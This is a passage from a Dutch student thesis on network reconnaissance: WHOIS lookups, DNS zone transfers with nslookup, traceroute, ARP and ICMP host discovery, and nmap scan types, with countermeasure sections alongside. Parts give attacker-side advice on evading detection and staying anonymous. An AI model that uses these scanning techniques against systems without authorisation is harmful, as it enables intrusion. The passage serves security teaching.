contactpersoon krijgen. Dit zijn de verschillende Regionale Internet Registers met hun bijhorende

WHOIS pagina:

IANA: http://www.iana.org/whois

ARIN: http://whois.arin.net/ui

LACNIC: http://lacnic.net/cgi-bin/lacnic/whois

AFRNIC: http://www.afrinic.net/en/services/whois-query

RIPE: https://apps.db.ripe.net/search/query.html

APNIC: http://wq.apnic.net/apnic-bin/whois.pl

Page 37: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

37

3.1 Opzoeken van een IP-adres Tegenmaatregels Als een organisatie een range van IP-adressen aanvraagt of een domein laat registreren, moet

deze organisatie of individu informatie verschaffen aan de RIR. Al deze informatie is terug te vinden

als je een IP-adres opzoekt op de WHOIS pagina van de RIR. Een voorbeeld vindt je op de volgende

pagina: figuur 3-1 WHOIS pagina www.hubrussel.net.

Wat je kan doen als tegenmaatregel is de informatie die je verstrekt beveiligen.

Bv het telefoonnummer dat je opgeeft is een telefoonnummer dat extra beveiligd wordt zodat er geen

dial-in atttack kan plaatsvinden. Het beste wat je kan doen is een telefoonnummer en een e-mailadres

aanmaken dat alleen maar dient voor deze WHOIS pagina. De gegevens die je verstrekt kan je dan

observeren en op die manier te weten komen uit welke hoek er een aanval zou kunnen komen.

Je kunt op verschillende manieren de eigenschappen van je domein veranderen. Het is belangrijk dat

je de veiligste manier kiest, anders zou het kunnen dat je domein gehijacket wordt. Dit wil zeggen dat

ze al het verkeer naar je domein kunnen omleiden naar een ander domein.

Een veiligere manier om een domein op het internet te hebben is bij een domeinnaamverdeler een

domeinnaam te kopen. Jouw informatie is dan veilig, alleen de informatie van de provider van de

domeinnaam komt op de WHOS pagina. Een voorbeeld hiervan is:

http://www.godaddy.com/?isc=gtnieu50&ci=13333

Figuur 3-1 WHOIS pagina www.hubrussel.net

Page 38: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

38

3.2 DNS Interrogatie

3.2.1 Zone transfers Een zone transfer bekent dat je een secundaire master server maakt waarmee je de zone database van

de primaire master overneemt. Dit kan je gebruiken voor redundantie: als de primaire master server

uitvalt, kan je de secundaire master server gebruiken als back-up. Het is dus een handig systeem, maar

bij sommige configuraties is dit niet goed beveiligd. Hierdoor kan een onbevoegd iemand een zone

transfer doen naar een fictieve secundaire master. Zo kan hij al de gegevens van die bepaalde DNS-

server verkrijgen. Met deze gegevens zou de aanvaller heel het interne netwerk in kaart kunnen

brengen.

Om een zone transfer te kunnen uitvoeren zal je op een netwerk moeten zijn waar lokaal een DNS-

server aanwezig is. Er zijn verschillende manieren om dit te doen, manueel kan je het programma

nslookup gebruiken die meestal meegeleverd is met Linux en Windows. Je kan ook geautomatiseerde

tools gebruiken zoals dig, host of Sam Spade.

We zullen nslookup starten in interactieve modus. Je opent de Command Prompt in Windows of de

terminal in Linux en dan typ je het commando nslookup:

nslookup

Het programma nslookup is nu gestart en het eerste wat hij laat zien is de standaard ingestelde DNS-

server. Als volgt definieer je de server naar wie je de zone transfer wilt uitvoeren, dus de secundaire

server.

192.168.1.1

Hiermee zeg je dat je al de dns gegevens wil hebben.

Set type=any

Met het volgend commando zal je al de gegevens van example.com nemen en die doorgeven aan het

bestand zone_out zodat je er hiermee later nog kunt werken. Met het punt dat na example.com komt,

maak je duidelijk dat het bij deze naam blijft.

Ls –d example.com. >\> /tmp/zone_out

Als volgt kan je in dit bestand zoeken naar mogelijk kwetsbare systemen. Je kan in dit bestand zoeken

naar interessante woorden zoals “test”, je kan dit doen met grep, sed, awk of perl. Hierdoor zal je meer

gegevens vinden over testomgevingen. Deze testomgevingen zijn meestal minder goed beveiligd dan

andere omgevingen.

Met de volgende tools kan je dit proces automatiseren:

Windows: Sam Spade (http://www.garykessler.net/library/is_tools_sam_spade.html )

UNIX/Linux: dig, host

Een andere goede tool om een dns-zone transfer te doen is dnsrecon. Deze tool zal een recursieve

DNS-zone transfer doen. Deze tool kan je downloaden via de volgende link:

https://github.com/darkoperator/dnsrecon

Bij al deze vorige tools moet de functie DNS-zone transfer aan staan op de primaire DNS-server. Dit is

niet altijd het geval. De tool die je alsnog kan gebruiken is fierce.

Het host commando kan je ook gebruiken om te weten te komen waar de mail server staat. Deze staat

meestal in hetzelfde netwerk als de firewall server. Waardoor je meteen een goede plaats hebt om je

aanval te starten.

Page 39: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

39

3.2.2 DNS-zone transfer Tegenmaatregels Een goed tegenargument is om zone transfers alleen maar toelaten aan mensen die hiervoor

geautoriseerd zijn. Dit kan je doen door Cryptographic Transaction Signatures (TSIG) toe te passen.

Je kan eveneens de functie om zone transfers te doen volledig uitschakelen.

Je kan ook via een firewall alle inkomende connecties op TCP poort 53 weigeren, dit is de poort die

nodig is om een zone transfer uit te voeren. Dit omdat de meeste lookup requests UDP zijn en een

zone transfer is TCP.

Ondanks deze maatregelen is het nog altijd mogelijk om namelookups te doen. De aanvallers zouden

dan reverse lookups kunnen doen naar al de IP adressen van een nameblock. Hierdoor zou je externe

DNS-server nooit mogen configureren met informatie van het interne netwerk. Er wordt ook afgeraden

om HINFO te gebruiken.

4 Network Reconnaissance Nu onze zoektocht naar potentiele netwerken gedaan is, kan je proberen de topologie van het netwerk

te achterhalen. Je kan ook potentiële wegen vinden om tot in het netwerk binnen te dringen.

4.1 Tracerouting Traceroute is een tool waarmee je een IP pakket kan volgen. Per hop zal er uitleg verschijnen op je

scherm waar dit IP pakket passeert.

Als er in de output van traceroute een “Request timed out.” verschijnt, dan weet je dat op die plaats

het netwerk gefilterd wordt.

UNIX/Linux, Windows: traceroute (ftp://ftp.ee.lbl.gov/traceroute.tar.gz )

4.1.1 Hoe werkt traceroute? Traceroute gebruikt het TTL veld in het IP-pakket. Dit is het time to live veld, elke router waar dit pakket

passeert zal het time to live veld laten zakken met 1.

TTL begint aan 1, het pakket passeert de eerste router dus zet deze dit TTL veld gelijk aan 0. Hierdoor

stuurt deze router een ICMP TIME_EXCEEDED bericht terug.

Vervolgens is TTL 2, het pakket passeert dus terug de eerste router, deze verlaagt dit gegeven met 1

waardoor de TTL 1 is. Het pakket wordt dan nu doorgegeven naar de volgende router. Deze router zal

de TTL ook verlagen met 1 waardoor de TTL op 0 komt te staan. Deze router zal dan op zijn beurt een

ICMP TIME_EXCEEDED bericht terugsturen.

Het traceroute commando kan dan een volgend schema opbouwen door de IP pakketten te

analyseren.

Page 40: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

40

GUI tools:

Windows: tcptraceroute (michael.toren.net/code/tcptracerouting )

Windows: Cain & Abel (oxid.it )

4.2 Network Reconnaissance Tegenmaatregels Er bestaan verschillende tools om te detecteren of iemand een scan doet van uw network. De

twee tools die ik zal bespreken zijn Network Intrusion Detection Systems (NIDS) en Intrusion

Prevention Systems (IPS).

4.2.1 NIDS Een NIDS is een systeem dat zal detecteren of er iemand een scan probeert uit te voeren op uw

netwerk. Een NIDS wordt geplaats op een monitoring poort, dit systeem zal dus passief uw netwerk

monitoren en zal dus niet de mogelijkheid hebben om de scan te blokkeren. Een NIDS zal niet alleen

effectief zijn tegen scans maar ook als iemand een worm of een virus probeert te verspreiden over uw

netwerk. De NIDS zal alles wat hij tegenkomt loggen en in een databank steken. Als er zaken gebeuren

waarvan de attentie van de netwerkbeheerder nodig is zal deze NIDS een alert doorsturen naar de

netwerkbeheerder waarop de netwerkbeheerder kan reageren.

De volgende twee NIDS worden veel gebruikt, omdat ze goed en gratis zijn:

Snort: dit systeem is te vinden via de volgende url: http://www.snort.org/.

Bro-IDS: dit systeem is te vinden via de volgende url: http://www.bro.org/.

4.2.2 IPS Een IPS is een systeem dat zal detecteren of er iemand een scan probeert uit te voeren op uw netwerk.

Het verschil tussen een NIDS en een IPS is dat een IPS inline staat, dus dat het verkeer door hem moet

gaan vooraleer het je netwerk bereikt. Hij doet dit door de persoon die de scan uitvoert te blokkeren.

Hij kan dit enerzijds doen door al het verkeer van de bron tegen te houden en anderzijds door

aanpassingen te doen in de firewall of aan de router. Wat een IPS ook kan doen is een patch

doorvoeren waardoor gevoelige software aangepast wordt en zo niet meer gevoelig is voor aanvallen.

Een IPS kan ook als er een e-mail binnenkomt met een geïnfecteerd bestand als bijlage (een virus of

een worm). Dan kan hij deze bijlage van de e-mail verwijderen en dan de e-mail alsnog laten aankomen

bij de bestemming.

De volgende IPS wordt veel gebruikt omdat hij goed en gratis is:

Snort: dit systeem is te vinden via de volgende url: http://www.snort.org/.

4.2.3 Conclusie Het is goed om zowel een IPS als een IDS te hebben om je netwerk goed te kunnen beveiligen. Dit

omdat ze elk op een andere plaats in het netwerk staan. Een IPS zal je meestal op de rand van je

netwerk plaatsen om alles dat van buitenaf komt tegen te houden. Een IDS zal je meestal achter je

firewall plaatsen zodat deze het interne verkeer kan analyseren, hierdoor zal je ook een goed zicht

krijgen op het verkeer dat zich binnen de onderneming plaatsvindt.

5 Conclusie Aanvallers kunnen op vele verschillende manieren meer te weten komen over een bedrijf of een

individu. Er zijn sommige aanvallen waar je weinig aan kunt doen en andere die je helemaal kan

blokkeren. De IT-wereld verandert dagelijks, er zullen dus ook in de toekomst nog vele manieren

Page 41: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

41

bijkomen die aanvallers kunnen gebruiken om informatie over een individu of een bedrijf te weten te

komen.

Het belangrijkste als aanvaller is dat je anoniem blijft, zodat de mensen waartegen je een aanval wilt

doen niets op voorhand doorhebben.

Page 42: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

42

Page 43: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

43

Stap 2: Scanning 1 Algemene Inleiding In de vorige stap hebben we het gehad over hoe je een bedrijf in kaart moet brengen en hoe je

verschillende gevoelige gegevens kan te weten komen over een bedrijf. In deze stap gaan we hierin

verder, hier zullen we verschillende scans uitvoeren om zo het netwerk van het betreffende bedrijf in

kaart te brengen. We zullen ook te weten kunnen komen hoe we door firewalls kunnen dringen en

welke apparaten met welke versie in het netwerk actief zijn.

2 Host Discovery Ondertussen zijn we er al achter gekomen welke IP-ranges er gehanteerd worden in het bedrijf. Om

echter exact te weten te komen achter welke IP-adressen apparaten actief zijn moeten we een scan

van het netwerk uitvoeren. Dit wordt ook wel een ping-sweep of host-discovery genoemd.

Als je het woord “ping” hoort, denk je meteen aan ICMP, maar bij de term “ping-sweep” wordt er

ook gebruik gemaakt van ARP, ICMP, TCP en UDP. Dit zijn verschillende manieren die zullen

besproken worden in de volgende hoofdstukken.

3 ARP Host Discovery

3.1 MAC-ADRES Elk toestel dat verbonden is met het internet heeft een uniek nummer. Dit uniek nummer wordt een

MAC-adres genoemd, dit adres wordt ook wel een hardware-adres genoemd.

Dit MAC-adres behoort tot de data-link laag van het OSI-model.

Dit MAC-adres is meestal opgeslagen in de read-only memory van de network interface card (NIC).

Dit MAC-adres is toegewezen aan de NIC door de fabrikant.

Een voorbeeld van een MAC-adres is: 24-B6-FD-4E-6F-BF. Uit dit MAC-adres kan je afleiden dat het

een toestel van Dell is. Dit kan je afleiden uit de eerste 6 hexadecimale cijfers. De betekenis van deze

6 hexadecimale cijfers kan je manueel opzoeken in:

http://standards.ieee.org/develop/regauth/oui/oui.txt of een tool gebruiken zoals

http://www.coffer.com/mac_find/.

Meer informatie over het MAC-adres: http://en.wikipedia.org/wiki/MAC_address.

Page 44: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

44

3.2 ARP-protocol Host-discovery kan je doen door het ARP protocol te gebruiken. Het ARP-protocol is een protocol dat

MAC-adressen zal vertalen naar IP-adressen. Dit ARP-protocol maakt het mogelijk dat computers

binnen hetzelfde netwerk met elkaar kunnen communiceren zonder hun MAC-adres te kennen.

ARP maakt gebruik van een broadcast. Hierdoor kan je ARP-scanning enkel gebruiken als je een scan

wilt uitvoeren op hetzelfde broadcastdomein waarin jij aanwezig bent. Als jij iets wilt versturen naar

een IP adres, bijvoorbeeld 192.168.1.2. Dan zal ARP het volgende doen:

Eerst zal ARP zoeken in zijn ARP-tabel naar het IP-adres. De ARP-tabel kan je vinden door het

volgende commando in te typen in een Windows computer:

Commando:

C:\Users\nathan> arp –a

Bekomen resultaat:

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 7c-03-d8-c2-31-b8 dynamic

192.168.1.16 cc-08-e0-20-f8-74 dynamic

192.168.1.255 ff-ff-ff-ff-ff-ff static

255.255.255.255 ff-ff-ff-ff-ff-ff static

In deze tabel staat het IP-adres met daarnaast het overeenkomstige MAC-adres.

Als het IP-adres nog niet in de tabel staat zal het ARP protocol het volgende doen:

Om te weten te komen welk MAC-adres achter het IP-adres 192.168.1.2 zit zal ARP een ARP Request

Broadcast uitsturen. Dit bevat de volgende gegevens:

source MAC: 00:24:d7:c9:5f:f8, source IP: 192.168.1.3

destination MAC: ff:ff:ff:ff:ff:ff (broadcast), destination IP: 192.168.1.2

Elke computer die in het netwerk staat zal deze aanvraag ontvangen omdat het een broadcast is. Maar enkel de computer (NIC) waarvoor het bestemd is, zal antwoorden met een unicastpakket. Dit is een pakket dat enkel naar de doel MAC-adres gestuurd wordt. source MAC: 00:16:ce:29:81:22, source IP: 192.168.1.2

destination MAC: 00:24:d7:c9:5f:f8, destination IP: 192.168.1.3

Voor meer informatie over het ARP-protocol: http://en.wikipedia.org/wiki/Address_Resolution_Protocol

Page 45: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

45

3.3 ARP-netwerk scan Bij een ARP-netwerk scan zal je naar elke host binnen het netwerksegment een ARP request sturen.

Van al de toestellen die een ARP reply terugsturen weet je of ze actief in het netwerk aanwezig zijn.

Hierdoor ben je ook van elk toestel het MAC-adres te weten gekomen.

Een ARP-netwerk scan kan je met de volgende tools doen. Deze tools zullen in hoofdstuk 6 uitgebreid

worden besproken:

UNIX/Linux:

ARP-scan van NTA Monitor (www.nta-monitor.com/tools/arp-scan/ )

root@bt:~# ./arp-scan 192.168.1.0/24

Network Mapper (Nmap) van Fyodor (www.nmap.org )

root@bt:~# nmap –sn –PR 192.168.1.0/24

Windows:

Network Mapper (Nmap) van Fyodor (www.nmap.org )

nmap –sn –PR 192.168.1.0/24

Cain van Oxid (www.oxid.it/cain.html)

sniffer > rechtermuisklik > scan MAC-adressen

Page 46: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

46

4 ICMP Host Discovery ICMP (Internet Control Message Protocol) ook wel een ping genoemd. Dit is een protocol dat

gebruikt wordt om te identificeren of een toestel actief is op het netwerk. Het wordt door hackers

gebruikt om waardevolle informatie over het netwerk te weten te komen, maar het is ook een

protocol dat netwerkbeheerders gebruiken om problemen op het netwerk te troubleshooten.

Hierdoor zijn er veel netwerken die het gebruik van het ICMP protocol uitgesloten hebben, en veel

netwerken die dit wel toestaan. Je zal met deze vorm van host discovery niet altijd het verwachte

resultaat bereiken.

Je kan verschillende soorten ICMP-berichten (pings) uitvoeren. Enkele veelgebruikte pings zijn:

Message Type

0 Echo Reply

3 Destination Unreachable

4 Source Quench

5 Redirect

8 Echo Request

11 Time Exceeded

12 Parameter Problem

13 Timestamp

14 Timestamp Reply

15 Information Request

16 Information Reply

17 Address Mask Request

18 Address Mask Reply

Een traditionele ping is een ECHO REQUEST. Hierbij zal de verzender een ECHO REQUEST uitsturen en

wachten tot hij een ECHO_REPLY terugkrijgt. Als hij een ECHO_REPLY terugkrijgt wilt het zeggen dat

het toestel actief op het netwerk aanwezig is.

Commando:

ping 192.168.1.1

Resultaat:

Pinging 192.168.1.1 with 32 bytes of data:

Reply from 192.168.1.1: bytes=32 time<1ms TTL=64

Reply from 192.168.1.1: bytes=32 time<1ms TTL=64

Reply from 192.168.1.1: bytes=32 time<1ms TTL=64

Reply from 192.168.1.1: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.1.1:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Voor meer informatie over het ICMP protocol:

http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol

Page 47: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

47

4.1 ICMP Host Discovery Tegenmaatregel Het is belangrijk om het ICMP protocol tegen te houden op het netwerk. Zo krijgt de hacker

het moeilijker om te weten te komen welke apparaten er aanstaan en bij welke ze kunnen proberen

binnen te breken.

4.1.1 Gebruik van een Intrusion Detection System Er bestaan veel intrusion detection systemen die detecteren of er een ping sweep wordt uitgevoerd.

Maar deze systemen beperken zich tot de detectie van zo een aanval. Dit zijn op zich wel goede tools

maar zolang er geen persoon kijkt naar wat het intrusion detection systeem ontdekt, zullen de

aanvallen zomaar kunnen doorgaan.

Windows: Snort (http://www.snort.org/)

UNIX/Linux:

Scanlogd (http://openwall.com/scanlogd/)

Courtney (http://packetstormsecurity.com/UNIX/audit/courtney-1.3.tar.Z)

Ippl (http://pltplp.net/ippl/)

Protolog (http://packetstormsecurity.com/UNIX/loggers/protolog-1.0.8.tar.gz)

4.1.2 Preventie van ping sweeps Als je ICMP verkeer toelaat in je netwerk, kan er een DOS aanval plaatsvinden.

Het is ook mogelijk om andere data te verstoppen in een ICMP ECHO pakket. Het is dus aangeraden

om het ICMP verkeer tegen te houden aan de rand van je netwerk. Je kan dit doen met een tool zoals

loki2.

Voor meer informatie over het loki2: http://www.phrack.org/issues.html?issue=51&id=6.

Als je je netwerk wil beveiligen, kan je ervoor kiezen om maar enkel bepaalde types ICMP berichten

toe te laten. Zoals besproken eerder in dit hoofdstuk kan je zien dat er vele verschillende ICMP

berichten mogelijk zijn. Je kan ervoor kiezen om enkel die door te laten die je zelf nuttig vindt om te

troubleshooten, zoals ICMP ECHO_REPLY, HOST_UNREACHABLE en TIME_EXCEEDED.

Het is nog veiliger als het ICMP verkeer door jouw ISP kan geblokkeerd worden, door gebruik te

maken van acces control list (ACL). Hierdoor kan de ISP aan u een ping sturen om uw connectiviteit

na te kijken en kunnen andere (buitenstaanders) dit niet doen.

Page 48: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

48

5 TCP / UDP Host Discovery Zoals uitgelegd in hoofdstuk 4 is gebruik maken van het ICMP protocol niet altijd de beste keuze.

Gelukkig zijn er nog andere manieren om een netwerkscan uit te voeren. Als het netwerk het ICMP

protocol niet toelaat kan je TCP of UDP host discovery toepassen.

Met TCP en UDP host discovery zal je proberen een connectie te maken met verschillende TCP- en

UDP-poorten. Hieruit kan je dan afleiden of deze poorten open, gefilterd of gesloten zijn.

Bijvoorbeeld: een webserver zal gebruik maken van de service HTTP op poort 80 of HTTPS op poort

443. En een webserver is meestal verbonden met het extern netwerk zodat mensen van buiten het

bedrijf ook de webpagina van het bedrijf kunnen raadplegen. Maar om veiligheidsredenen is het heel

waarschijnlijk dat het ICMP protocol afgesloten is. In dit geval kan je dus een TCP poortscan doen van

poort 80 of poort 443 op die webserver. Als je een antwoord krijgt op één van deze twee poorten,

constateer je dat die server actief is op de betreffende poort.

Een nadeel van TCP en UDP host discovery is dat er zeer veel poorten zijn die kunnen gebruikt

worden: van poort 1 tot poort 49151. Als je dus een TCP of UDP scan wilt uitvoeren kan je kiezen

voor een paar poorten (de meest gebruikte) of al de mogelijke poorten. Het beste is, zo gericht

mogelijk de scans uit te voeren om niet teveel argwaan te wekken. Als je al de poorten probeert te

scannen heb je het meeste kans op succes, maar dan zal de verantwoordelijk van het netwerk waarin

je de poortscan uitvoert ook weten dat er een poortscan plaatsgevonden heeft. En dan kan deze

persoon maatregelen treffen.

Voor meer informatie over de verschillende mogelijke poorten:

http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers.

5.1 Poort scanning

5.1.1 Verschil tussen TCP en UDP In de volgende tabel wordt het TCP protocol vergeleken met het UDP protocol. Beide protocollen

worden gebruikt voor verschillende functies in het netwerk.

Voorbeeld:

- TCP poort 23: Telnet

- TCP poort 80: HTTP

- UDP poort 53: DNS

Page 49: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

49

Uitleg TCP UDP

Staat voor Transmission Control Protocol User Datagram Protocol of Universal Datagram Protocol

Connectie Connectie georiënteerd, stelt eerst een connectie op voordat er gegevens kunnen worden verstuurd.

Connectieloos er zal niet eerste een connectie opgesteld worden.

Gebruik TCP zal veelal gebruikt worden door applicaties die zeker moeten zijn dat de verbinding behouden wordt. De snelheid is minder belangrijk.

UDP wordt veelal gebruikt door applicaties waarvoor het snel moet gaan.

Voorbeelden FTP, HTTP, HTTPS, SMTP, Telnet Live video streaming, VoIP, DNS

Snelheid van de overdracht Trager als UDP omdat er bij TCP aan foutcontrole gedaan wordt

Sneller als TCP omdat er bij UDP niet aan foutcontrole gedaan wordt.

Betrouwbaarheid Bij TCP is het belangrijk dat alle pakketten aankomen op hun bestemming. Als dit niet gebeurt, zullen ze opnieuw verzonden worden.

Bij UDP kan het zijn dat er enkele pakketten wegvallen. Aangezien de snelheid hier belangrijk is zullen ze niet opnieuw verstuurd worden.

Gewicht TCP is een protocol dat meer van het netwerk vraagt als UDP. TCP heeft eerst en vooral 3 pakketten nodig om een connectie op te zetten, voordat er data kan gestuurd worden.

UDP is een lichtgewicht protocol.

Foutcontrole TCP doet aan foutcontrole. UDP doet niet aan foutcontrole.

Velden in een pakket 1. Sequence Number

2. ACK Number

3. Data offset

4. Reserved

5. Control bit

6. Window

7. Urgent pointer

8. Options

9. Padding

10. Check Sum

11. Source port

12. Destination port

1. Length

2. Source port

3. Destination port

4. Check sum

Handshake Three-way-handshake

SYN

SYN-ACK

ACK

Geen handshake want het is een connectieloos protocol.

Tabel 5-1 Verschil tussen TCP en UDP

Bron: http://www.diffen.com/difference/TCP_vs_UDP

Page 50: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

50

Bij poortscanning zal je pakketten naar TCP en UDP poorten sturen, hier kan je van afleiden welke

poorten aan het “luisteren” zijn. Op die manier kan je ook services achterhalen want achter elke

poort zit een bepaalde service. Bovendien kan je ook te weten komen welke versie van het

besturingssysteem en welke versie van service er gebruikt wordt.

Een poort die aan het “luisteren” is, is een weg naar binnen in het systeem.

Met een poortscan kan je het volgende in kaart brengen:

De luisterende TCP- en UDP-services

Het type van besturingssysteem

De specifieke versies van een service

5.1.2 Programma’s waarmee je TCP en UDP scans kan uitvoeren Er zijn veel tools waarmee je poortscans kan uitvoeren. De tools die besproken zullen worden zijn,

Nmap, ScanLine en Netcat.

5.1.2.1 Nmap

Nmap doet aan intelligente poortscans. Dit wil zeggen dat ze eerst met een ping of een ARP-scan zal

nagaan of de toestellen die je wil scannen, aangesloten zijn op het netwerk. Als dit het geval is, dan

zal de poortscan beginnen.

5.1.2.2 ScanLine

ScanLine is een tool die gebruikt wordt op Windows computers via het opdrachtprompt. Je kan

hiermee scans uitvoeren. Dit is een tool dat niet hoeft geïnstalleerd worden op een systeem. Dit

maakt het gemakkelijk om binnen te sluizen in een systeem dat vertrouwd is op een netwerk en

hiermee dan scans uitvoeren.

5.1.2.3 Netcat

Netcat is een “old school” tool dat voor veel verschillende doeleinden kan gebruikt worden.

Aangezien Netcat over zoveel functionaliteiten beschikt wordt het ook wel “het Zwitsers zakmes” van

hacking genoemd. Het is een tool die weinig sporen zal achterlaten als deze een poortscan uitvoert.

Je kan deze tool dus het best gebruiken als je zo weinig mogelijk sporen wilt achterlaten op een

systeem.

Page 51: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

51

6 Netwerk verkenning tools

6.1 Nmap Nmap is een zeer krachtige tool als het gaat over het scannen van een netwerk. Nmap heeft zeer veel

opties die je kan aan en uitzetten. Dit zijn er teveel om hier te bespreken, ik zal enkel de belangrijkste

bespreken.

6.1.1 ICMP In dit hoofdstuk zullen de variabelen besproken worden die met Nmap meegestuurd kunnen worden

om verschillende ICMP scans uit te voeren.

nmap –sn 192.168.1.1

Als non root user:

TCP ping van poort 80 en poort 443 zoals beschreven in 3.5

Als root user:

Geen poort scan

Stuurt een ICMP ECHO REQUEST

ARP scan zoals beschreven in 3.3

TCP ping van poort 80 en poort 443 zoals beschreven in 3.5

nmap –PE 192.168.1.1

Stuurt een ICMP ECHO REQUEST

6.1.2 TCP/UDP poort scanning In dit hoofdstuk zullen de variabelen besproken worden die met Nmap meegestuurd kunnen worden

om verschillende poortscans uit te voeren. Zie hoofdstuk 5.1.3 voor meer informatie over poortscans

met Nmap.

Er zijn verschillende scan types die je kan uitvoeren. We zullen deze scans uitvoeren met de tool

Nmap. Je kan hiermee de volgende poortscans uitvoeren:

6.1.2.1 Verschillende types poortscan

Negeer Host Discovery (-Pn)

Negeer de Host Discovery, moest je dit niet doen dan zou je scan eerst een ICMP host

discovery doen en dan enkel een poortscan doen bij de apparaten die actief zijn. Onze

bedoeling is net de hosts die niet te vinden zijn met een host discovery te vinden.

Commando: nmap –Pn 192.168.1.1

TCP Connect scan (-sT):

Een volledige three-way handshake (SYN, SYN/ACK, ACK)

Duurt langer dan andere scans

Heeft meer kans om gelogd te worden door het gescande systeem

Heeft geen administrator privileges nodig om deze scan uit te voeren

Commando: nmap –sT 192.168.1.1

Page 52: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

52

TCP SYN scan (-sS):

Een halve three-way handshake (SYN, SYN/ACK)

Er wordt een SYN pakket verstuurd:

o als er een SYN/ACK terugkomt, weet je dat de poort aan het luisteren is

o als er een SYN/RST terugkomt, weet je dat de poort niet aan het luisteren is

Heeft minder kans om gelogd te worden door het gescande systeem

Kan gezien worden als een DOS aanval, omdat veel half open connecties gestart worden

Commando: nmap –sS 192.168.1.1

TCP FIN scan (-sF):

Er wordt een FIN pakket gestuurd

Er komt een RST pakket terug van al de gesloten poorten

Deze techniek werkt meestal op UNIX gebaseerde systemen

Commando: nmap –sF 192.168.1.1

TCP Xmas Tree scan (-sX):

Er wordt een FIN, URG en PUSH pakket gestuurd

Er komt een RST pakket terug van al de gesloten poorten

Commando: nmap –sX 192.168.1.1

TCP Null scan (-sN):

Er wordt een een serie van pakketten gestuurd

o met een sequence number van 0

o zonder flags

Omdat er geen flags aanwezig zijn kan het zijn dat deze scan door een firewall kan gaan

omdat deze firewall zal controleren op de flags

Er komt een RST pakket terug van al de gesloten poorten

Commando: nmap –sN 192.168.1.1

Bron: http://www.plixer.com/blog/scrutinizer/the-null-scan-you%E2%80%99re-being-

watched/

TCP ACK scan (-sA):

Er wordt een ACK pakket gestuurd

Het kan je helpen om na te gaan of de firewall een simpele pakket filter is die alleen ACK

pakketten doorlaat, omdat hij denkt dat er al een deel van de “three way handshake”

voltooid is.

Het kan je helpen nagaan of het gaat om een statefull firewall die aan advanced pakket

filtering doet

Commando: nmap –sA 192.168.1.1

Page 53: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

53

TCP Windows scan (-sW):

Er wordt een ACK pakket gestuurd

Het wordt meestal niet gelogd door het systeem

Er worden geen sessies geopend, dus er is niet veel netwerkverkeer

Omdat er enkel een ACK gestuurd wordt is er een mogelijkheid dat deze scan door de firewall

zal gaan

Er zal een RST pakket terugkomen van elke poort ook als deze toe is. Aan deze RST pakketten

zal een “window size” bijkomen:

o “Window size 0”: wil zeggen dat de poort toe is

o “Window size > 0”: wil zeggen dat de poort open is

Heeft administrator privileges nodig op het systeem vanwaar je je scan uitvoert

Commando: nmap –sW 192.168.1.1

Bron: http://www.networkuptime.com/nmap/page3-13.shtml

TCP RPC scan (-sR of -sV):

Er wordt een Remote Procedure Call (RPC) Null pakket gestuurd

Met deze scan kan je nagaan op welke computers RPC applicaties staan met hun

versienummer.

Commando: nmap –sR 192.168.1.1

Commando: nmap –sV 192.168.1.1

Bron: http://www.networkuptime.com/nmap/page3-14.shtml

UDP scan (-sU):

Dit is een trage scan, de resultaten zijn dan ook niet altijd even betrouwbaar

Er wordt een UDP pakket gestuurd:

o als er een “ICMP port unreachable” terugkomt dan is de poort gesloten (type 3 code

3)

